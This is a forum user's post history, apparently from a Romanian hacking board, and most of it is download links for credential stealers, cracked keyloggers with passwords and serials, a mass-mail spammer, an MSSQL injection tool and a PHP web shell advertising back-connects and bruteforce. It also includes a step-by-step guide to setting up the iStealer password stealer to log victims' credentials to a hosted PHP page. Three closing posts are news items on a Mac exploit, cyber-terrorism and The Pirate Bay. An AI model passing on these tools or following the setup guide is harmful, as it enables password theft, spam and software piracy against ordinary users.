-
Posts
18734 -
Joined
-
Last visited
-
Days Won
710
Everything posted by Nytro
-
Download: http://www.2shared.com/file/6971993/22b131dc/LabStealer.html
-
It retrieves: - Outlook - Firefox - IE >= 7 - MSN Download: http://www.2shared.com/file/6971977/bb5fd84b/PS_online.html
-
Password: ghanshyam_thori
-
Error based MSSQL Injector. Written in VB. Download: http://www.2shared.com/file/6971911/466daf8/dbex.html
-
Sureshot Ghost Keylogger v.3.80 Quick Keylogger 2.1.027 Embrace Family Key Logger Easy Keyboard Logger v.1.0 Blazingtools Perfect Keylogger v.1.6.2.0 Ardamax Keylogger v.1.9 All with cracks Download: http://rapidshare.com/files/1910024/Key_Logger_Collection.rar Password: ghanshyam_thori
-
Download: http://roooga.googlepages.com/EgySpyv1.13.rar
-
Download: http://rapidshare.com/files/93069143/VicSpy2008_upped_by_AKEXOR_.rar Password: crazy-coderz.net
-
Download: http://rapidshare.com/files/258046819/Vaqxination_v2.3_Public.rar Antidote: http://rapidshare.com/files/258074253/Cure.rar
-
SERIAL: NAME: Kimberley Ronald SERIAL: RGA3Y3A-M3D88-T3HU5-T28TM-G47AS-SFTD7-624JC Download: http://www.megaupload.com/?d=ELSITFN7
-
[+] Authorization [+] Server Information [+] File manager (copy, rename, move, delete, chmod, touch, creating files and folders) [+] View, hexview, edit, download, upload files [+] Console [+] SQL manager (MySQL, PostgreSQL) [+] Implementation of PHP code [+] Safe mode bypass [+] Work with strings + Search hashes in online databases [+] Bruteforce (FTP, MySql, PostgreSQL) [+] Bindports & back-connects (C / Perl) [+] Autoremove [+] AJAX (can turn off) [+] many other Download: http://www.sendspace.com/file/aefy4n
-
Downloader? Hmm, nu stiu ce sa zic. Eu unul nu stau sa verific daca e infectat. Iti asumi riscurile daca vrei sa il incerci.
-
Download: http://rapidshare.com/files/113971760/Remote.Password.Stealer.v2.7.Retail-ZWT.rar
-
Download: http://www.2shared.com/file/6955683/c5548397/Midnight_Stealer_15.html
-
Download: http://www.2shared.com/file/6955660/c2deffa3/HH_STEALER_v13.html
-
Download v3.0: http://www.mediafire.com/?ruiw5yummdd Download v4.0: http://www.mediafire.com/download.php?zwzjyzyjine
-
Download: http://www.2shared.com/file/5201353/6a9ccd48/SedurnasS_StealerS_Pack.html Mirror: http://www.file-upload.net/download-1555872/Sedurnas--S-Stealer--S-Pack.rar.html
-
Download Ardamax Keylogger 3.0 + Serial + Videotutorial Download: http://www.megaupload.com/?d=RLQU8FRX Password: Securityspl0its
-
Nu e problema mea, nu folosesc asa ceva
-
~ List spamming ~ external SMTP ~ progressbar In a new version i will include an internal STMP so you can spam better and without a llimit =) . It´s a SPAMMER and NOT a BOMBER Download: http://ul.to/wekimy
-
Got a hash? Will chase it for online services? Now it has become much easier! Download ArxFuckingHash, enter hash (md5, Mysql, Sha1) and run the program itself will take place on the list of public services and make the parsing, then you display the result in a convenient form. Advantages: - Work in 10 streams (10 to check services at once). - Search for md5, sha1, mysql. - Ability to edit the configuration of servers (servers.ini), ie you can compile your own list. - The program has a convenient, attractive interface. - Search multiple hash (adding to the list). - Create a md5 string, or file. - Built-checker working and not working services / settings. - Ability to edit mode, online services, see web page at once, and the source code. - Also in the folder, help, help file is for editing the parameters of service. Supported types of hash: - Md5 - Sha-1 - MySQL Updates Second Edition: - Added 3 new MD5 service, now 28! - Now you can create not only the MD5 hash, and SHA1, CRC - A new system for determining the type of hash - Now the program is not only in Russian but in English - Transfer the program to be in a separate file, which makes it possible to translate the program into any language - Fixed a couple of mistakes In the folder is a file 'english.txt', to translate to English language, just rename the file 'english.txt' on 'active.txt'. Download: http://depositfiles.com/files/9gx0vr7zk http://rghost.ru/363643
-
Mendacious: The wait is over, 3.0, 4.0 and now 5.0! The widely anticipated iStealer 5.0 has been released. This version of iStealer does NOT use FTP instead it uses PHP logging. I've decided to release it because it is no longer FUD - about 50% detectable. I've analyzed it and have ran it on a virtual machine and checked connections, all clean. iStealer v6.0 is coming soon. You will probably be impressed. Now lets set-up iStealer! Step 1: Register at http://www.blackapplehost.com/register.jsp Step 2: Go to UserCP. Click "Create/delete MySQL database" Name the database what you want, it will include your username. In this example my username will be "example". I have named my database "example_db" Press "Create Database" Now for the user, I have named mine "example_user" Password can be anything, mine will be "passw0rd" Press "Create User" For Assign Priviledges, make sure the user and database are selected on the list. When all boxes are ticked, press "Assign Priviledges" Step 3: Download iStealer v5.0 (MOD) Backdoored Step 4: Open \iStealer5.1\PHP Logger\index.php and edit the configuration information. All of the information is commented at the side, it's clear what it is. Leave localhost. Step 5: At BAH, go to "File manager" in the User CP and upload index.php & style.css After this, your iStealer is set up, http://username.blackapplehost.com/index.php Log in there to view your logs. Simple enough. Step 6: Open iStealer 5.0.1 and fill in all of the necessary information. The "Url" will be http://username.blackapplehost.com/index.php Finished! (Total Credits to: Vaqxine and V3n0m_x for the tutorial)
-
Source ( Perl ): http://guidjos.justfree.com/plc.txt Usage: plc.pl proxylistfilename.txt Mini proxy list for testing: 174.143.236.197:80 64.76.22.107:8080 190.139.107.68:8080 200.127.215.78:80 200.45.199.129:3128 203.30.254.117:8080 202.131.94.58:808 134.184.84.204:80 189.109.46.210:3128 200.129.25.3:8080 201.54.235.115:3128 200.148.230.217:3128 189.56.61.33:3128 200.139.78.209:3128 189.80.232.1:3128
-
O noua bresa in securitatea Mac OSX de Mina Hutterer | 31 iulie 2009 Un analist in domeniul securitatii software a descoperit o noua mare "gaura" in securitatea sistemului de operare Mac OS X. Noua tehnica le permite hackerilor sa preia controlul asupra computerelor cu OS X si sa fure date care se presupune ca sunt encrypted. Tot ceea ce trebuie facut este sa se obtina accesul la memorie. Cu doar cateva linii de cod, atacatorul poate obtine acces la memoria root, pe care apoi o "completeaza" pentru a realiza o conexiune TCP prin care hackerul apoi poate descarca malware si controla computerul de la distanta. Analistul Dino Zovi a demonstrat cum atacul poate fi folosit pentru a prelua controlul asupra browser-ului Safari si pentru a fura date si informatii despre contul bancar al utilizatorului. "Mac-urile nu sunt protejate de vreun praf magic. Sa scrii exploit-uri pentru Vista cere munca. Sa scrii exploit-uri pentru Mac este foarte fun." Sursa: Daily Tech
-
Teroristii ar putea lansa atacuri nucleare... de pe net de Mina Hutterer | 30 iulie 2009 Problema securitatii retelelor de computere incepe sa depaseasca limitele atacurilor de tip Ddos (Distributed denial-of-service). Teoretic, devine posibila provocarea unui razboi nuclear strict prin utilizarea Internetului. Conform unui articol publicat de The Guardian, rezultatele unui studiu realizat la cererea International Commission on Nuclear Non-proliferation and Disarmament (ICNND) sugereaza ca, in anumite circumstante, teroristii ar putea sa "sparga" computerele responsabile cu sistemele de aparare ale statelor care detin arsenal nuclear, dupa care sa provoace statul respectiv sa lanseze un atac nuclear care ar putea declansa un sir de evenimente catastrofice, cu impact la nivel global. In studiul respectiv se mentioneaza ca "aceasta ar fi o alternativa mai facila pentru grupurile teroriste, care astfel nu ar mai fi nevoite sa construiasca sau sa obtina o arma nucleara sau sa isi produca propriile 'dirty bombs'". Desi studiul subliniaza ca media si industria de divertisment de multe ori exagereaza riscul ciber-terorismului, acelasi studiu prezinta totusi o serie de situatii in care hackerii ar putea utiliza tehnici de razboi informatic pentru a facilita un atac nuclear. "In ciuda faptului ca statele cu arsenal nuclear pretind ca ordinele de lansare a rachetelor nucleare nu pot fi date decat de la nivelul cel mai inalt al autoritatilor, exista numeroase exemple care indica posibilitatea de a ocoli ierarhia si de a insera ordine la nivelurile inferioare", a declarat Jason Fritz, autorul studiului. "De asemenea, ciber-teroristii ar putea provoca lansarea unei rachete nucleare si prin dereglarea sistemelor de avertizare si identificare (early warning and identification) sau a retelelor de comunicatii". Guvernele lumii au accelerat in ultima vreme politicile de imbunatatire a sistemelor de cyber-defence, dupa ce hackerii au lansat mai multe atacuri impotriva unor natiuni, printre care se numara SUA si Marea Britanie. Cu toate acestea, studiul sugereaza ca, desi guvernele sunt din ce in ce mai constiente de posibilitatea unui razboi pe Internet, imbunatatirea apararii nu elimina pericolul ca un grup terorist sa atace online prin metode neconventionale. "Atacurile din 9/11 sunt fara precedent si au fost executate cu arme neconventionale si acelasi principiu se poate aplica si in cazul unui ciber-atac de proportii", se mai arata in studiu. Sursa: The Guardian
-
Hollywood vs The Pirate Bay de Mina Hutterer | 29 iulie 2009 Scandalul TPB continua la un nou nivel - mari companii producatoare de filme au dat in judecata operatorii faimosului sit de torente. Producatorii de la Hollywood declara ca au inceput actiunea in instanta pentru a opri distributia ilegala a 100 de filme si programe de televiziune prin intermediul The Pirate Bay. Printre numele sonore citate se numara House, Desperate Housewives, Grey's Anatomy, The Matrix, Die Hard si Harry Potter. Acest nou proces vine dupa operatorii The Pirate Bay - Fredrik Neij, Gottfrid Svartholm Warg si Peter Sunde - au fost deja condamnati si amendati pentru activitatile intreprinse. Printre companiile care au initiat actiunea in judecata se numara Columbia Pictures, Disney Enterprises si Universal Studios. Acestea cer aplicarea unor noi amenzi operatorilor si inchiderea definitiva a sitului The Pirate Bay.